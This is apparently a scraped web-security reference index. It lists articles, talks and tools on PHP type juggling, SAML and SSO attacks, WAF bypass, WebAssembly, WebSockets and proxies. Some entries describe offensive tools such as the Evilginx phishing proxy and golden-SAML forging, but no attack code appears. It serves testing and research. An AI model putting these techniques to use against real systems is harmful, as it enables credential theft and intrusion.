- Abusing PHP query string parser to bypass IDS, IPS, and WAF - theMiddle(2019)
- In this post, we'll see how the PHP query string parser could lead to many IDS/IPS and Application Firewall rules bypass.
- Abusing PHP query string parser to bypass IDS, IPS, and WAF - theMiddle(2019)
- Type Juggling
- 101
- Articles/Blogposts/Writeups
- (Super) Magic Hashes - myst404
- "TL;DR: Magic hashes are well known specific hashes used to exploit Type Juggling attacks in PHP. Combined with bcrypt limitations, we propose the concept of Super Magic Hashes. These hashes can detect 3 different vulnerabilities: type juggling, weak password storage and incorrect Bcrypt usage. A Go PoC found some MD5, SHA1 and SHA224 super magic hashes."
- Writing Exploits For Exotic Bug Classes: PHP Type Juggling
- From hacked client to 0day discovery - infoteam
- PHP equivalency check failure writeup
- (Super) Magic Hashes - myst404
- Writeups
- Php Codz Hacking
- Writeups of specific PHP vulns
- Privilege Escalation in 2.3M WooCommerce Shops - Karim El Ouerghemmi, Slavco Mihajloski
- During our research we discovered a PHP Object Injection vulnerability in WooCommerce (CVE-2017-18356) that allows to escalate privileges with a unique and interesting injection technique.
- Php Codz Hacking
- Tools
- 101 * Protocol Buffers - Google * "Protocol buffers are Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data – think XML, but smaller, faster, and simpler. You define how you want your data to be structured once, then you can use special generated source code to easily write and read your structured data to and from a variety of data streams and using a variety of languages."
- gRPC
- 101
- General
- Tools
- grpcurl
- Like cURL, but for gRPC: Command-line tool for interacting with gRPC servers
- grpcurl
- 101
- Articles/Blogposts/Writeups
- Executing commands in ruby
- Attacking Ruby on Rails Applications - phrack
- Going AUTH the Rails on a Crazy Train: A Dive into Rails Authentication and Authorization
- Property Oriented Programming - Applied to Ruby
- Pentesting Django and Rails
- Executing commands in ruby
- Execution of shell code in Ruby scripts
- Pre-Auth RCE in Aspera Faspex: Case Guide for Auditing Ruby on Rails - Maxwell Garrett, Shubham Shah
- Tools
- Brakeman
- Brakeman is an open source static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
- Brakeman
- 101
- RFC 6454: The Web Origin Concept
- This document defines the concept of an "origin", which is often used as the scope of authority or privilege by user agents. Typically, user agents isolate content retrieved from different origins to prevent malicious web site operators from interfering with the operation of benign web sites. In addition to outlining the principles that underlie the concept of origin, this document details how to determine the origin of a URI and how to serialize an origin into a string. It also defines an HTTP header field, named "Origin", that indicates which origins are associated with an HTTP request.
- Same-origin policy - Mozilla
- The same-origin policy is a critical security mechanism that restricts how a document or script loaded from one origin can interact with a resource from another origin. It helps isolate potentially malicious documents, reducing possible attack vectors.
- Same-origin policy - Wikipedia
- Same-origin Policy - W3
- RFC 6454: The Web Origin Concept
- Articles/Blogposts/Writeups
- Whitepaper: The Definitive Guide to Same-origin Policy - Alex Baker, Ziyahan Albeniz, Emre Iyidogan
- Same-Origin Policy: From birth until today - Alex Nikolova
- [My hacking adventures with Safari reader mode - Nikhil Mittal(2020)](https://payatu.com/blog/my-hacking-adventures-with-safari-reader-mode/
- WebSockets not Bound by SOP and CORS? Does this mean… - Drew Branch(2018)
- The Same-Origin Policy Gone Wild - Parsia(2020)
- Talks/Presentations
- 101
- Articles/Blogposts/Writeups
- With Great Power Comes Great Pwnage
- Out of Band XML External Entity Injection via SAML SSO - Sean Melia
- Web-based Single Sign-On and the Dangers of SAML XML Parsing
- Following the white Rabbit Down the SAML Code
- Evilginx - Advanced Phishing with Two-factor Authentication Bypass
- SAML All the Things! A Deep Dive into SAML SSO - Elijah A. Martin-Merrill
- Golden SAML Attack
- Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps
- shimit
- In a golden SAML attack, attackers can gain access to an application (any application that supports SAML authentication) with any privileges they desire and be any user on the targeted application. shimit allows the user to create a signed SAMLResponse object, and use it to open a session in the Service Provider. shimit now supports AWS Console as a Service Provider, more are in the works...
- Tools
- Evilginx
- Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.
- SAMLReQuest Burpsuite Extention
- Evilginx
- 101
- Service Worker - w3c
- This specification describes a method that enables applications to take advantage of persistent background processing, including hooks to enable bootstrapping of web applications while offline. The core of this system is an event-driven Web Worker, which responds to events dispatched from documents and other sources. A system for managing installation, versions, and upgrades is provided. The service worker is a generic entry point for event-driven background processing in the Web Platform that is extensible by other specifications.
- Web Worker - Wikipedia
- Web workers vs Service workers vs Worklets - bitsofcode(2018)
- Service Worker - w3c
- Articles/Blogposts/Writeups
- Service Workers: an Introduction - developers.google
- Service Worker API - MDN(Mozilla)
- Using Service Workers - MDN(Mozilla)
- ServiceWorker is dangerous - @steike(@2014)
- Abusing the Service Workers API - Daniel Abeles(2020)
- Stuff I wish I'd known sooner about service workers - Rich Harris
- Service Worker Security FAQ - Chromium.google
- Papers
- Master of Web Puppets: Abusing Web Browsersfor Persistent and Stealthy Computation - Panagiotis Papadopoulos, Panagiotis Ilia, Michalis Polychronakis, Evangelos P. Markatos, Sotiris Ioannidis, Giorgos Vasiliadis(2019)
- In this paper, we demonstrate the powerful capabilitiesthat modern browser APIs provide to attackers by presentingMarioNet: a framework that allows a remote malicious entity tocontrol a visitor’s browser and abuse its resources for unwantedcomputation or harmful operations, such as cryptocurrencymining, password-cracking, and DDoS. MarioNet relies solely onalready available HTML5 APIs, without requiring the installationof any additional software. In contrast to previous browser-based botnets, the persistence and stealthiness characteristics ofMarioNet allow the malicious computations to continue in thebackground of the browser even after the user closes the windowor tab of the initially visited malicious website. We present thedesign, implementation, and evaluation of our prototype system,which is compatible with all major browsers, and discuss potentialdefense strategies to counter the threat of such persistent in-browser attacks. Our main goal is to raise awareness about thisnew class of attacks, and inform the design of future browserAPIs so that they provide a more secure client-side environmentfor web applications.
- Master of Web Puppets: Abusing Web Browsersfor Persistent and Stealthy Computation - Panagiotis Papadopoulos, Panagiotis Ilia, Michalis Polychronakis, Evangelos P. Markatos, Sotiris Ioannidis, Giorgos Vasiliadis(2019)
- Tools
- Service Worker Cookbook
- The Service Worker Cookbook is a collection of working, practical examples of using service workers in modern web sites.
- Service Worker Cookbook
- 101
- 101
- Subresource Integrity - W3.org
- Subresource Integrity - w3c.github.io
- This specification defines a mechanism by which user agents may verify that a fetched resource has been delivered without unexpected manipulation.
- Articles/Blogposts/Writeups
- Tools
- 101
- Transport Layer Security - Wikipedia
- RFC 6101: The Secure Sockets Layer (SSL) Protocol Version 3.0 - IETF
- RFC 2246: The TLS Protocol - IETF
- RFC 5246: The Transport Layer Security (TLS) Protocol Version 1.2 - IETF
- RFC 8446: The Transport Layer Security (TLS) Protocol Version 1.3 - IETF
- RFC 8740: Using TLS 1.3 with HTTP/2 - IETF
- Articles/Blogposts/Presentations/Talks/Writeups
- Transport Layer Security (TLS) Extensions
- Mixed content - w3c
- This specification describes how a user agent should handle fetching of content over unencrypted or unauthenticated connections in the context of an encrypted and authenticated document.
- Understanding SSL — Secure Socket Layer | 2023 - Karthikeyan Nagaraj(2022)
- How HTTPS Works
- A Detailed Look at RFC 8446 (a.k.a. TLS 1.3) - Nick Sullivan(2018)
- curl’s TLS fingerprint - Daniel Stenberg(2022)
- Attacks Against
- Articles/Blogposts/Writeups
- Talks/Presentations
- SSL/TLS Interception Proxies and Transitive Trust
- Secure Sockets Layer (SSL) and its successor Transport Layer Security (TLS), have become key components of the modern Internet. The privacy, integrity, and authenticity provided by these protocols are critical to allowing sensitive communications to occur. Without these systems, e-commerce, online banking, and business-to-business exchange of information would likely be far less frequent. Threat actors have also recognized the benefits of transport security, and they are increasingly turning to SSL to hide their activities. Advanced Persistent Threat (APT ) attackers, botnets, and eve n commodity web attacks can leverage SSL encryption to evade detection. To counter these tactics, organizations are increasingly deploying security controls that intercept end-to-end encrypted channels. Web proxies, data loss prevention (DLP) systems, specialized threat detection solutions, and network intrusion prevention systems (NIPS) offer functionality to intercept, inspect, and filter encrypted traffic. Similar functionality is present in lawful intercept systems and solutions enabling the broad surveillance of encrypted communications by governments. Broadly classified as “SSL/TLS interception proxies”, these solutions act as a “man-in-the-middle", violating the end-to-end security promises of SSL. This type of interception comes at a cost. Intercepting SSL-encrypted connections sacrifices a degree of privacy and integrity for the benefit of content inspection, often at the risk of authenticity and endpoint validation. Implementers and designers of SSL interception proxies should consider these risks and understand how their systems operate in unusual circumstances
- SSL/TLS Interception Proxies and Transitive Trust
- Tools
- 101
- Articles/Blogposts/Writeups
- Single Sign-On Security: Security Analysis of real-life OpenID Connect Implementations - Lauritz HoltmanN(2020)
- Improving OAuth App-to-App Security - Fabian Hauck, Joseph Heenan, Daniel Fett(2020)
- Security and Privacy of Social Logins (I): Single Sign-On Protocols in the Wild - Louis Jannett(2021) SSO Wars: The Token Menace - Alvaro MuÒoz, Oleksandr Mirosh
- Common Federated Identity Protocols: OpenID Connect vs OAuth vs SAML 2 - Security Journey
- Breaking Through Single Sign On (SSO) - Alex Bainbridge
- Talks & Presentations
- Dupe Key Confusion
- attack to bypass XML signature verification by sending multiple key identifiers in the KeyInfo section. Vulnerable systems will use the first one to verify the XML signature and the second one to verify the trust on the signing party. This plugin applies this technique to SAML tokens by allowing to modify and then resign the SAML assertion with an arbitrary attacker-controlled key which is then send as the first element of the KeyInfo section, while the original key identifier is sent as the second key identifier.
- Tools
- Tools
- PrOfESSOS
- PrOfESSOS is our open source implementation for fully automated Evaluation-as-a-Service for SSO. PrOfESSOS introduces a generic approach to improve the security of OpenID Connect implementations by systematically detecting vulnerabilities.
- PrOfESSOS
- 101
- Streams - Dec12 2019
- This specification provides APIs for creating, composing, and consuming streams of data that map efficiently to low-level I/O primitives.
- Streams - Dec12 2019
- 101
- Articles/Blogposts
- Talks/Presentations
- Unraveling Unicode: A Bag of Tricks for Bug Hunting - Chris Weber(BHUSA2009)
- 5 Unicode Vulnerabilities that could bi/yte you - Philippe Arteau
- Slides
- "In this talk, you will learn about the security implications of encoding conversion. Normalizing a UTF-8 string to ASCII only character has numerous potential side effects. The latest research affecting Unicode will be summarized including the HostSplit and HostBond attacks. The HostSplit attack abuses minor characters conversion to trigger open redirect or Server-Side Request Forgery (SSRF). While HostBond is a risk affecting service provider giving subdomain to account created by users. Aside from normalization, uppercase and lowercase transformation can introduce vulnerability. Encoding can be used to circumvent security controls such as Web Application Firewalls. Punycode is the new representation to support domains with special characters outside of ASCII. This representation can be used to create visual confusion to end users."
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- Data URIs
- 101
- data URI scheme - Wikipedia
- The data URI scheme is a uniform resource identifier (URI) scheme that provides a way to include data in-line in Web pages as if they were external resources. It is a form of file literal or here document. This technique allows normally separate elements such as images and style sheets to be fetched in a single Hypertext Transfer Protocol (HTTP) request, which may be more efficient than multiple HTTP requests, and used by several browser extensions to package images as well as other multimedia contents in a single HTML file for page saving. As of 2015, data URIs are fully supported by most major browsers, and partially supported in Internet Explorer and Microsoft Edge.
- Data URLs - MDN(Mozilla)
- Data URIs - Chris Coyier
- data URI scheme - Wikipedia
- Articles/Blogposts/Writeups
- Tools
- 101
- 101
- Awesome WAF
- 🔥 Everything awesome about web-application firewalls (WAF).
- Awesome WAF
- Web Application Firewalls
- ModSecurity
- ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys
- Shadow Daemon
- Shadow Daemon is a collection of tools to detect, protocol and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the license GPLv2, so its source code can be examined, modified and distributed by everyone.
- ModSecurity
- Articles/Blogposts/Writeups
- Bypassing WAFs
- WAF Bypass Cheatsheet/gitbook
- Web Application Firewall (WAF) Evasion Techniques - theMiddle
- Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle
- Web Application Firewall (WAF) Evasion Techniques - secjuice
- Bypassing Web-Application Firewalls by abusing SSL/TLS - 0x09AL
- Request encoding to bypass web application firewalls - NCCGroup
- Bypassing Web-Application Firewalls by abusing SSL/TLS - 0x09AL
- WAF bypass techniques - Pentestit(2019)
- A Pentesters Guide - Part 5 (Unmasking WAFs and Finding the Source) - pyr0cc
- WAF Bypassing with Unicode Compatibility - Jorge Lajara(2020)
- Bypassing WAF to do advanced Error-Based SQL Injection - kleiton0x7e(2020)
- Bypassing CDN WAF’s with Alternate Domain Routing - Ryan Gerstenkorn(2022)
- How to Bypass Cloudflare in 2023: The 8 Best Methods - ZenRows(2023)
- A guide to non-conventional WAF/IDS evasion techniques - 0xFFFFF
- Web application firewalls bypasses collection and testing tools
- {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF - Noam Moshe(2022)
- Bypass firewalls with of-CORs and typo-squatting - Grayson(2023)
- Talks & Presentations
- HTTP Invisibility Cloak by Soroush Dalili - SteelCon2017
- This talk illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
- Web Application Firewall Profiling and Evasion - Michael Ritter
- Let's Talk About WAF (Bypass) Baby - Brett Gravois(NolaCon2019)
- All modern Web Application Firewalls are able to intercept (and even block) most common attacks from the web. However, what happens when an attacker uses HTTP2 to send attack traffic to a web application or service? In this talk we will cover basic attacks against web applications using HTTP2 to bypass WAFs and Proxies. Attendees will gain knowledge of how to bypass WAF and Proxies using the HTTP2 Protocol, and steps they can take to protect themselves against these kinds of attacks.
- Modern WAF Bypass Scripting Techniques for Autonomous Attacks - Jonny Xmas(2019)
- WAF Breakthrough in the Cloud Era - pyn3rd(2019)
- AutoSpear : Towards Automatically Bypassing and Inspecting Web Application Firewalls - Zhenqing Qu, Xiang Ling, Chunming Wu(BHAsia2022)
- HTTP Invisibility Cloak by Soroush Dalili - SteelCon2017
- Tools
- WhatWaf
- WhatWaf is an advanced firewall detection tool who's goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application, and attempting to detect a bypass (or two) for said firewall, on the specified target.
- WAFPASS
- Analysing parameters with all payloads' bypass methods, aiming at benchmarking security solutions like WAF.
- WAF_buster
- LightBulb
- LightBulb is an open source python framework for auditing web application firewalls and filters.
- WAFNinja
- WAFNinja is a tool which contains two functions to attack Web Application Firewalls.
- Web Application Firewall Profiling and Evasion - Michael Ritter - OWASP
- Guide To Identifying And Bypassing WAFs
- ftw
- Framework for Testing WAFs (FTW!)
- wafw00f
- WAFW00F allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website.
- cdn-proxy
- A tool that can be used by web app pentesters to create a copy of a targeted website with CDN and WAF restrictions disabled.
- WhatWaf
- 101
- Web Assembly
- WebAssembly Specification
- A cartoon intro to WebAssembly Articles
- Lin Clark: A Cartoon Intro to WebAssembly | JSConf EU 2017
- WebAssembly Design Documents
- This repository contains documents describing the design and high-level overview of WebAssembly.
- WebAssembly - MDN(Mozilla)
- How WebAssembly changes software distribution - Max Desiatov(2020)
- WebAssembly. Scary name, exciting applications. - Nicky Meuleman
- wasm-fizzbuzz - Cornelius Diekmann
- WebAssembly from Scratch: From FizzBuzz to DooM.
- Articles/Papers/Talks/Writeups
- Papers
- Security Chasms of WASM - Brian McFadden, Tyler Lukasiewicz, Jeff Dileo, Justin Engler(2018)
- WebAssembly is a new technology that allows web developers to run native C/C++on a webpage with near-native performance. This paper provides a basic introduc-tiontoWebAssemblyandexaminesthesecurityrisksthatadevelopermaytakeonbyusing it. We cover several examples exploring the theoretical security implications ofWebAssembly. We also cover Emscripten, which is currently the most popular Web-Assembly compiler toolchain. Our assessment of Emscripten includes its implemen-tation of compiler-and-linker-level exploit mitigations as well as the internal harden-ing of itslibcimplementation, and how its augmentation of WASM introduces newattack vectors and methods of exploitation. We also provide examples of memorycorruption exploits in the Wasm environment. Under certain circumstances, theseexploits could lead to to hijacking control flow or even executing arbitrary JavaScriptwithin the context of the web page. Finally, we provide a basic outline of best prac-tices and security considerations for developers wishing to integrate WebAssemblyinto their product.
- Everything Old is New Again:Binary Security of WebAssembly - Daniel Lehmann, Johannes Kinder, Michael Pradel(2020)
- WebAssembly is an increasingly popular compilation targetdesigned to run code in browsers and on other platforms safelyand securely, by strictly separating code and data, enforcingtypes, and limiting indirect control flow. Still, vulnerabilitiesin memory-unsafe source languages can translate to vulnera-bilities in WebAssembly binaries. In this paper, we analyze towhat extent vulnerabilities are exploitable in WebAssemblybinaries, and how this compares to native code. We find thatmany classic vulnerabilities which, due to common mitiga-tions, are no longer exploitable in native binaries, are com-pletely exposed in WebAssembly. Moreover, WebAssemblyenables unique attacks, such as overwriting supposedly con-stant data or manipulating the heap using a stack overflow. Wepresent a set of attack primitives that enable an attacker (i) towrite arbitrary memory, (ii) to overwrite sensitive data, and(iii) to trigger unexpected behavior by diverting control flowor manipulating the host environment. We provide a set ofvulnerable proof-of-concept applications along with completeend-to-end exploits, which cover three WebAssembly plat-forms. An empirical risk assessment on real-world binariesand SPEC CPU programs compiled to WebAssembly showsthat our attack primitives are likely to be feasible in practice.Overall, our findings show a perhaps surprising lack of binarysecurity in WebAssembly. We discuss potential protectionmechanisms to mitigate the resulting risks.
- Security Chasms of WASM - Brian McFadden, Tyler Lukasiewicz, Jeff Dileo, Justin Engler(2018)
- Tools
- WebAssembly for .NET
- A library able to create, read, modify, write and execute WebAssembly (WASM) files from .NET-based applications. Execution does not use an interpreter. WASM instructions are mapped to their .NET equivalents and converted to native machine language by the .NET JIT compiler.
- octopus
- Security Analysis tool for WebAssembly module (wasm) and Blockchain Smart Contracts (BTC/ETH/NEO/EOS)
- WasmEdge
- WasmEdge is a lightweight, high-performance, and extensible WebAssembly runtime for cloud native, edge, and decentralized applications. It powers serverless apps, embedded functions, microservices, smart contracts, and IoT devices.
- WebAssembly for .NET
- Reversing
- Web-(Dis)Assembly - Christophe Alladoum - Shakacon X
https://github.com/sophos/WebAssembly/blob/master/Misc/Web-(Dis)Assembly.pdf
- Analyzing WebAssembly binaries: initial feel and behavioral analysis - John Bergbom
- Analyzing WebAssembly binaries - Wasm Reverse Engineering - John Bergbom
- Manual reverse engineering of WebAssembly: static code analysis - John Bergbom
- Web-(Dis)Assembly - Christophe Alladoum - Shakacon X
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- 101
- 101
- Articles/Blogposts/Writeups
- 101
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations
- Weird proxies/2 and a bit of magic - Aleksei Tiurin(ZeroNights2021)
- Reverse proxies and their variations are used everywhere in modern web applications for routing, caching, and access differentiation. This talk is dedicated to new research results about different reverse proxies and new possibilities brought by HTTP/2. It is a collection of tricks for exploiting various misconfigurations.
- Weird proxies/2 and a bit of magic - Aleksei Tiurin(ZeroNights2021)
- Tools
- Burpsuite
- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
- See burp section at bottom of page.
- ZAP - Zed Attack Proxy
- The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
- ZAP Deep Dive Series - StackHawk
- https://www.youtube.com/playlist?list=PLz_NN8o2uh8AQ7VyUEN1GCCnpzl5_FaJA
- https://github.com/zaproxy/zap-extensions/wiki/HelpAddonsOpenapiOpenapi
- https://github.com/zaproxy/zap-extensions
- https://github.com/we45/ZAP-Mini-Workshop
- Paros - Web Proxy
- A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
- Mallory: Transparent TCP and UDP Proxy
- Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.
- TCP Catcher
- TcpCatcher is a free TCP, SOCKS, HTTP and HTTPS proxy monitor server software.
- wssip
- Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
- ratproxy
- Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
- proxify
- Swiss Army Knife Proxy for rapid deployments. Supports multiple operations such as request/response dump, filtering and manipulation via DSL language, upstream HTTP/Socks5 proxy. Additionally, a replay utility allows to import the dumped traffic (request/responses with correct domain name) into BurpSuite or any other proxy by simply setting the upstream proxy to proxify.
- Burpsuite
- 101
- Articles/Papers/Talks/Writeups
- WebRTC API - MozillaDevNetwork
- WebRTC - High Performance Browser Networking
- WebRTC for the Curious: Go beyond the APIs
- he WebRTC book that explains everything. WebRTC is a real-time communication framework that makes it easy to build real-time interactions for web and mobile devices. You will learn about the WebRTC specification and how all the protocols work in depth, not just a tour of the APIs. The book is completely Open Source and available at https://webrtcforthecurious.com and https://github.com/webrtc-for-the-curious/webrtc-for-the-curious Learn the full details of ICE, SCTP, DTLS, SRTP, and how they work together to make up the WebRTC stack. Hear how WebRTC implementers debug issues with the tools of the trade. Listen to interviews with the authors of foundational WebRTC tech! Hear the motivations and design details that pre-dated WebRTC by 20 years. Explore the cutting edge of what people are building with WebRTC. Learn about interesting use cases and how real-world applications get designed, tested and implemented in production. Written by developers who have written all of this from scratch. We learned it the hard way, now we want to share it with you! This book is vendor agnostic and multiple Open Source projects and companies are involved. We would love to have you involved!
- Exploiting CVE-2022-0778, a bug in OpenSSL vis-à-vis WebRTC platforms - Sandro Gauci(2022)
- Tools
- Miscellaneous
- Apache
- IIS
- Jetty
- NGINX
- 101
- The WebSocket Protocol Standard - IETF
- WebSocket Protocol - RFC Draft 17
- Websockets - An Introduction - subudeepak
- RFC 6455: The WebSocket Protocol - IETF
- The WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in to communications from that code. The security model used for this is the origin-based security model commonly used by web browsers. The protocol consists of an opening handshake followed by basic message framing, layered over TCP. The goal of this technology is to provide a mechanism for browser-based applications that need two-way communication with servers that does not rely on opening multiple HTTP connections (e.g., using XMLHttpRequest or
<iframe>
s and long polling).
- The WebSocket Protocol enables two-way communication between a client running untrusted code in a controlled environment to a remote host that has opted-in to communications from that code. The security model used for this is the origin-based security model commonly used by web browsers. The protocol consists of an opening handshake followed by basic message framing, layered over TCP. The goal of this technology is to provide a mechanism for browser-based applications that need two-way communication with servers that does not rely on opening multiple HTTP connections (e.g., using XMLHttpRequest or
- How Do Websockets Work? - Kevin Sookocheff(2019)
- Articles/Papers/Talks/Writeups
- What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs. - Mikhail Egorov
- Hacking Web Sockets: All Web Pentest Tools Welcomed - VDALabs(2019)
- To Fuzz a WebSocket - Andreas Happe(2019)
- Once upon a time there was a WebSocket - Jason Gillam(2020)
- WebSockets: Attack Techniques and Protection Measures - Michael Schneider(2021)
- Everything You Need to Know About Web Socket Pentesting - Saket Taneja(2021)
- HN Discussion on 'Websocket Handbook' (2022)
- Talks/Presentations/Videos
- Old Tools, New Tricks: Hacking WebSockets - Michael Fowl, Nick Defoe(Derbycon2019)
- Old Tools, New Tricks: Hacking WebSockets - Michael Fowl, Nick Defoe(2019)
- Many application penetration testers and developers have struggled to figure out how to assess the security of WebSocket applications. When new technologies like WebSockets are developed, often the tooling available for penetration testing takes awhile to catch up. What if you could use traditional web penetration testing tools to assess WebSockets? By leveraging concepts found in native code fuzzing, you can! We have been using a novel approach that allows traditional web security testing tools to find vulnerabilities in WebSocket applications.
- Tools
- WSSiP: A WebSocket Manipulation Proxy
- Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
- Websocket Fuzzer
- A simple websocket fuzzer for application penetration testing.; HTML5 WebSocket message fuzzer
- websocket-harness
- This python script can be placed between traditional web penetration testing tools and WebSocket connections, which does translation from HTTP to WebSocket and back. Think of it like a fuzzing harness that is used for native code.
- cswsh
- A command-line tool for Cross-Site WebSocket Hijacking
- SockJS-client
- SockJS is a browser JavaScript library that provides a WebSocket-like object. SockJS gives you a coherent, cross-browser, Javascript API which creates a low latency, full duplex, cross-domain communication channel between the browser and the web server.
- uWebSockets
- "Simple, secure & standards compliant web server for the most demanding of applications"
- websockets
- "Library for building WebSocket servers and clients in Python"
- websocat
- Command-line client for WebSockets, like netcat (or curl) for ws:// with advanced socat-like functions
- WSSiP: A WebSocket Manipulation Proxy
- Miscellaneous
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Presentations/Talks/Writeups
- WebUSB - How a website could steal data off your phone
- This blog post looks in to the capabilities of WebUSB to understand how it works, the new attack surface, and privacy issues. We will describe the processes necessary to get access to devices and how permissions are handled in the browser. Then we will discuss some security implications and shows, how a website can use WebUSB to establish an ADB connection and effectively compromise a connected Android phone.
- WebUSB - How a website could steal data off your phone
- General Stuff
- Securing
- See Defense page.
- Guides & Methodologies
- Documents/Writeups
- OWASP Testing Checklist
- WebAppSec Testing Checklist
- OWASP Testing Checklist(OTGv4)
- OWASP based Web Application Security Testing Checklist is an Excel based checklist which helps you to track the status of completed and pending test cases. This checklist is completely based on OWASP Testing Guide v 4. The OWASP Testing Guide includes a “best practice” penetration testing framework which users can implement in their own organizations and a “low level” penetration testing guide that describes techniques for testing most common web application security issues. Moreover, the checklist also contains OWASP Risk Assessment Calculator and Summary Findings template.
- LTR101: Web App Testing - Methods to The Madness - Andy Gill
- LTR101: Web Application Testing Methodologies - Andy Gill
- OWASP Web Application Security Testing Cheat Sheet
- 120 Days of High Frequency Hunting - Kuldeep Pandya(2022
- The-XSS-Rat Security Testing notes
- How To Hack Web Applications in 2022: Part 1 - Luke Stephens(2022)
- 0-Day Hunting (Chaining Bugs/Methodology) - RiotSecurityTeam(2021)
- Pentesting Web checklist - six2dez
- HolyBugx/HolyTips
- "A Collection of Notes, Checklists, Writeups on Bug Bounty Hunting and Web Application Security."
- MindMaps
- Collection of various mindmaps for testing.
- Online Casino Roulette – A guideline for penetration testers and security researchers - Jesús Calderón Marín(2020)
- Common Security Issues in Financially-Oriented Web Applications - Soroush Dalil(2019)
- From ZERO To HERO In Web Security Research(Defcon29 Workshop)
- KathanP19/HowToHunt
- "Collection of methodology and test case for various web vulnerabilities."
- A Konami Code for Vuln Chaining Combos - Curtis Brazzell(2021)
- riramar/Web-Attack-Cheat-Sheet
- -bunch of tools and associated commands for techniques using said tools.
- Golden-Guide-for-Pentesting/Web Application
- This is a Web Security Guide for Pentesting, BugBounty and CTFs.
- Talks/Presentations
- The Bug Hunter’s Methodology - Jason Haddix @jhaddix(Defcon Safemode RedTeamVillage 2020)
- The Bug Hunter’s Methodology is an ongoing yearly installment on the newest tools and techniques for bug hunters and red teamers. This version explores both common and lesser-known techniques to find assets for a target. The topics discussed will look at finding a targets main seed domains, subdomains, IP space, and discuss cutting edge tools and automation for each topic. By the end of this session a bug hunter or red team we will be able to discover and multiply their attack surface. We also discuss several vulnerabilities and misconfigurations related to the recon phase of assessment.
- Web Application testing approach and cheating to win Jim McMurry Lee Neely Chelle Clements - Derbycon7
- Testing stateful web application workflows - András Veres-Szentkirályi(2016)
- Paper
- Most web applications used for complex business operations and/or employing advanced GUI frameworks have stateful functionality. Certain workflows, for example, might require completing certain steps before a transaction is committed, or a request sent by a client-side UI element might need several preceding requests that all contribute to the session state. Most automated tools focus on a request and maybe a redirection, thus completely missing the point in these cases, where resending a request gets ignored by the target application. As a result, while these tools are getting better day by day, using them for testing such execution paths are usually out of the question. Since thorough assessment is cumbersome without such tools, there's progress, but we are far from plug-and-play products. This paper focuses on the capabilities of currently available solutions, demonstrating their pros and cons, along with opportunities for improvement.
- Breaking and abusing specifications and policies - Frans Rosén(SecurityFest 2018)
- Last year at Secfest, Frans Rosén talked about DNS hijacking using cloud services. This time, he approaches technologies where verification methods actually exists and how to break them. Let’s Encrypt closed down one of their three blessed verification methods due to a bug Frans found in January. Cloud storage containers already patched from being publicly exposed are still often vulnerable to full modification, extraction and deletion by abusing weak policies and application logic. Frans goes through some weak design patterns, policy structures and explains how to bypass them which have netted him over $45,000 in bug bounties.
- Attacking Modern Web Technologies - Frans Rosén(NDC Oslo 2018)
- In this talk, top ranked white-hat hacker Frans Rosén will focus on methodologies and results of attacking modern web technologies. He will explain how he accessed private Slack tokens by using postMessage and WebSocket-reconnect, and how vulnerable configurations in both AWS and Google Cloud allow attackers to take full control of your assets.
- Live Bug Bounty Recon Session w/ @FransRosen 2019
- Free Tools For Webapp Hacking - BB King(WWHF Deadwood2020)
- The Bug Hunter’s Methodology - Jason Haddix @jhaddix(Defcon Safemode RedTeamVillage 2020)
- Documents/Writeups
- Tactics
- Writeups of techniques
- Using HTTP Pipelining to hide requests - digi.ninja
- Advanced web security topics - george georgovassilis(2020)
- Backslash Powered Scanning: Hunting Unknown Vulnerability Classes
